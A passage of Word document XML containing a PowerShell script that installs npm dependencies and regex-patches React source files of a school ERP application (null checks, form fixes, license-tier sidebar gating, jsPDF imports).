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09ACCBD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t># ═══════════════════════════════════════════════════════════════</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9C1CFA52">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># SSEWASSWA ERP — ULTIMATE CONSOLIDATED UPGRADE &amp; GIT PUSH SCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D45B694F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># Bulletproof Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="92F6BB37">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══════════════════════════════════════════════════════════════</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45C120">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="F6500F22">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $ErrorActionPreference = "Continue"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="939FC34E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "========================================" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BEF6603B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host " Executing Ultimate Consolidated Upgrade" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C1C68">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "========================================" -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D5A0AF17">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D3C522">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $root = $PSScriptRoot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866D1B0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (-not $root) { $root = Get-Location }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B61D71A4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="87A1F1B0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 1. INSTALL ALL DEPENDENCIES ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA6CF2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[1/15] Installing All Dependencies..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="80A5611B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Push-Location $root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C63FD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>npm install react-hot-toast javascript-obfuscator electron-store@8.2.0 react-refresh jspdf recharts react-icons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E50FDEF5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>npm install -D @rollup/plugin-replace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7621B6BF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Pop-Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ED20CBE6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA9023C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 2. FIX CRITICAL BUGS ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A19413C4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[2/15] Applying Critical Bug Fixes..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00D965">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F6D53E2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.1 Fix UI.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1CDDC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $uiPath = Join-Path $root "src\components\UI.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D512E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $uiPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C4DFD28E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $uiPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3C0D5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "};\s*}\s*$", "};`n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D4105E4E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $uiPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B1FB39D8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53454C63">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="E511CFDB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.2 Fix Sidebar.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702AB06">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $sidePath = Join-Path $root "src\layout\Sidebar.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AD3FC951">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $sidePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D6F96455">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $sidePath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C627E96A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var config = LEVEL_CONFIG\[schoolLevel\];", "var config = LEVEL_CONFIG[schoolLevel] || LEVEL_CONFIG['Primary'];"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D2D42A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "licenseTier") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="884F1A8D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $injectBlock = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924389D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>var config = LEVEL_CONFIG[schoolLevel] || LEVEL_CONFIG['Primary'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DA5FDB98">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>var [licenseTier, setLicenseTier] = React.useState('premium');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AD983DEB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>React.useEffect(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBD86C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (window.electronAPI &amp;&amp; window.electronAPI.getLicenseTier) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8FDD58">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    window.electronAPI.getLicenseTier().then(function(r) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AC1BD9B4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (r &amp;&amp; r.success) setLicenseTier(r.tier);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80C58D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="84B3E83D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="955A0708">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}, []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CCFA9FFB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>var premiumSections = ['emis', 'uneb'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A6093">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D99D71ED">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $injectBlockSafe = $injectBlock.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35695122">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "var config = LEVEL_CONFIG\[schoolLevel\] \|\| LEVEL_CONFIG\['Primary'\];", $injectBlockSafe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CBC292C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "if \(!allowedSections\.includes\(item\.section\)\) return false;", "if (!allowedSections.includes(item.section)) return false;`n if (licenseTier !== 'premium' &amp;&amp; premiumSections.indexOf(item.section) &gt;= 0) return false;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401841F9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="92D6AD6D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $sidePath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D564F9C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="928DBC1D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="CDD06D74">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.3 Fix PurchaseAuthorization.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4C6C3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $paPath = Join-Path $root "src\pages\PurchaseAuthorization.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="82992098">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $paPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E66E4C76">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $paPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5BBDD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "requested_by: user\.id", "requested_by: user?.id || null"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="80C3ED5F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310819E9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Safely escape backticks and dollar signs using single quotes and $$ replacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="94D7AF99">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $paFind = 'requested_by_name: `${user.role} - ${user.username}`'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA26C39">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $paReplace = 'requested_by_name: `${user?.role || ''System''} - ${user?.username || ''Unknown''}`'.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DF3C95F8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace [regex]::Escape($paFind), $paReplace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA9D87A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65428C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $paPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05529910">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F0971">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F22EF4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.4 Fix SystemSetup.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="89869E77">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $setupPath = Join-Path $root "src\pages\SystemSetup.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A4CD7956">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $setupPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FFB1403B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $setupPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F7B8D07D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace '&lt;input type="radio" checked=\{formData\.schoolLevel', '&lt;input type="radio" name="schoolLevel" checked={formData.schoolLevel'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="96C45576">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace '&lt;input type="radio" checked=\{formData\.genderType', '&lt;input type="radio" name="genderType" checked={formData.genderType'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8D488">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace '&lt;input type="radio" checked=\{formData\.boardingStatus', '&lt;input type="radio" name="boardingStatus" checked={formData.boardingStatus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5C21F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var handleChange = function\(e\) \{ setFormData\(function\(prev\) \{ var n = \{\}; for \(var k in prev\) n\[k\] = prev\[k\]; n\[e\.target\.name\] = e\.target\.value; return n; \} \); \};", "var handleChange = function(e) { setFormData(function(prev) { return { ...prev, [e.target.name]: e.target.value }; }); };"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E12B0F19">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $setupPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C4AE873C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F959E113">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="F27597FB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.5 Fix Students.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E00CE09E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $stuPath = Join-Path $root "src\pages\Students.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68455F23">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $stuPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="805637BC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $stuPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D045E7B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var is = \{ width: '100%', padding: '10px', border: '1px solid #dadce0', borderRadius: '6px', fontSize: '14px' \};", ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="917C7AA0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "if \(loading\) return React\.createElement\(.*?'Loading\.\.\.'\)\);", "if (loading) return (&lt;div className='page-container'&gt;&lt;h1 className='page-title'&gt;Students&lt;/h1&gt;&lt;p&gt;Loading...&lt;/p&gt;&lt;/div&gt;);"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BFA58A4F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "INSERT INTO students \(.*?\) VALUES \?,\?,\?,\?,\?,\?,\?,\?,\?,\?,\?,\?,\?,\?, 'Active'", "INSERT INTO students (first_name, last_name, other_name, gender, date_of_birth, class_id, student_type, residence, guardian_name, guardian_phone, admission_number, paycode, status) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,'Active')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE139CA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785540A7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $admLogic = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496F65B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>var finalData = {}; for (var k in formData) finalData[k] = formData[k];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B26334B1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> if (!finalData.admission_number || finalData.admission_number.trim() === '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94D87A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> var yr = new Date().getFullYear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E87B33F7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> var rand = Math.floor(1000 + Math.random() * 9000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BBAFA313">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> finalData.admission_number = 'ADM/' + yr + '/' + rand;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72107E8C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DDF255">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BCC03EFB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $admLogicSafe = $admLogic.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DBC45B61">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var finalData = \{\}; for \(var k in formData\) finalData\[k\] = formData\[k\];", $admLogicSafe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F23F2C7C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $stuPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A7EF7F67">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BF76CB6A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C846C152">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># 2.6 Fix DocumentEngine.js &amp; GenerateDocs.jsx &amp; DataExport.jsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="91A54D41">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $docEnginePath = Join-Path $root "src\utils\DocumentEngine.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9BB9D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $docEnginePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20003703">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $docEnginePath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240025E0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "import \{ jsPDF \} from 'jspdf';") { $c = "import { jsPDF } from 'jspdf';`n" + $c }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9C2D9E0A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "(?s)if \(typeof window === 'undefined' \|\| !window\.jspdf\) \{.*?const \{ jsPDF \} = window\.jspdf;", "const { jsPDF } = window.jspdf || {}; // Fallback handled by import"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A486F738">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $docEnginePath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B7881">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C40F12C1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="A7B0FDFA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $genDocsPath = Join-Path $root "src\pages\GenerateDocs.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="897A7E30">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $genDocsPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8680BA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $genDocsPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AEC56A60">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "var \{ jsPDF \} = window\.jspdf;", "var { jsPDF } = require('jspdf');"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9F2E6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $genDocsPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8E79DE9C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C4BBD30C">
      <w:pPr>
